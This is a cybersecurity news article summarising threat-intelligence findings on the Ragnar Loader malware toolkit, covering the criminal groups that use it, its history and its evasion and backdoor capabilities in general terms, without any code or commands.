Researchers have recently shed light on a sophisticated and evolving malware toolkit known as Ragnar Loader, which is utilized by various cybercrime and ransomware groups, including Ragnar Locker, FIN7, FIN8, and Ruthless Mantis.
According to Swiss cybersecurity company PRODAFT, “Ragnar Loader plays a crucial role in maintaining access to compromised systems, enabling attackers to sustain long-term operations within networks.”
While its exact ownership is unclear, it is believed that the developers of Ragnar Loader are continually updating the malware with new features, making it increasingly modular and difficult to detect.
Ragnar Loader, also referred to as Sardonic, was first identified by Bitdefender in August 2021 in connection with an unsuccessful attack carried out by FIN8 against a financial institution in the United States. It is believed to have been in use since 2020.
In July 2023, Symantec revealed that FIN8 had used an updated version of the backdoor to deliver the BlackCat ransomware.
The primary function of Ragnar Loader is to establish long-term footholds within targeted environments while employing various techniques to evade detection and maintain operational resilience.
According to PRODAFT, “The malware utilizes PowerShell-based payloads for execution, incorporates strong encryption and encoding methods, and employs sophisticated process injection strategies to establish and maintain stealthy control over compromised systems.”
These features collectively enhance its ability to evade detection and persist within targeted environments.
Ragnar Loader is offered to affiliates in the form of an archive file package containing multiple components to facilitate reverse shell, local privilege escalation, and remote desktop access.
It is designed to establish communications with the threat actor, allowing them to remotely control the infected system through a command-and-control (C2) panel.
Typically executed on victim systems using PowerShell, Ragnar Loader integrates various anti-analysis techniques to resist detection and obscure control flow logic.
Furthermore, it features the ability to conduct various backdoor operations by running DLL plugins and shellcode, as well as reading and exfiltrating the contents of arbitrary files.
To enable lateral movement within a network, it makes use of another PowerShell-based pivoting file.
Another critical component is a Linux executable ELF file named bc that’s designed to facilitate remote connections, permitting the adversary to launch and execute command-line instructions directly on the compromised system.
According to PRODAFT, “It employs advanced obfuscation, encryption, and anti-analysis techniques, including PowerShell-based payloads, RC4 and Base64 decryption routines, dynamic process injection, token manipulation, and lateral movement capabilities.”
These features exemplify the increasing complexity and adaptability of modern ransomware ecosystems.
